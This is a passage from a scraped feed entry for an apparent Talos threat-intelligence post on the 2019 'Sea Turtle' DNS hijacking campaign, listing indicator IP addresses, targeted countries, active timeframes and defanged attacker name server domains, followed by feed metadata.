\n\nIraq \n \n146.185.133.141\n\n| \n\nOctober\n\n| \n\n2018\n\n| \n\nLibya \n \n185.203.116.116\n\n| \n\nMay\n\n| \n\n2018\n\n| \n\nUAE \n \n95.179.150.92\n\n| \n\nNovember\n\n| \n\n2018\n\n| \n\nUAE \n \n174.138.0.113\n\n| \n\nSeptember\n\n| \n\n2018\n\n| \n\nUAE \n \n128.199.50.175\n\n| \n\nSeptember\n\n| \n\n2018\n\n| \n\nUAE \n \n139.59.134.216\n\n| \n\nJuly - December\n\n| \n\n2018\n\n| \n\nUnited States, Lebanon \n \n45.77.137.65\n\n| \n\nMarch - April\n\n| \n\n2019\n\n| \n\nSyria, Sweden \n \n142.54.164.189\n\n| \n\nMarch - April\n\n| \n\n2019\n\n| \n\nSyria \n \n199.247.17.221\n\n| \n\nMarch \n\n| \n\n2019\n\n| \n\nSweden \n \n** \n** \n\n\nThe following list contains the threat actor name server domains and their IP address.\n\n \n\n\nDomain\n\n| \n\nActive Timeframe\n\n| \n\nIP address \n \n---|---|--- \n \nns1[.]intersecdns[.]com\n\n| \n\nMarch - April 2019\n\n| \n\n95.179.150.101 \n \nns2[.]intersecdns[.]com\n\n| \n\nMarch - April 2019\n\n| \n\n95.179.150.101 \n \nns1[.]lcjcomputing[.]com\n\n| \n\nJanuary 2019 \n\n| \n\n95.179.150.101 \n \nns2[.]lcjcomputing[.]com\n\n| \n\nJanuary 2019 \n\n| \n\n95.179.150.101 \n \n", "modified": "2019-04-18T16:08:25", "published": "2019-04-18T16:08:25", "id": "TALOSBLOG:A09C50A444F2D7D6A5D4552C85316387", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/GSxJP9GzlhI/seaturtle.html", "type": "talosblog", "title": "DNS Hijacking Abuses Trust In Core Internet Service", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
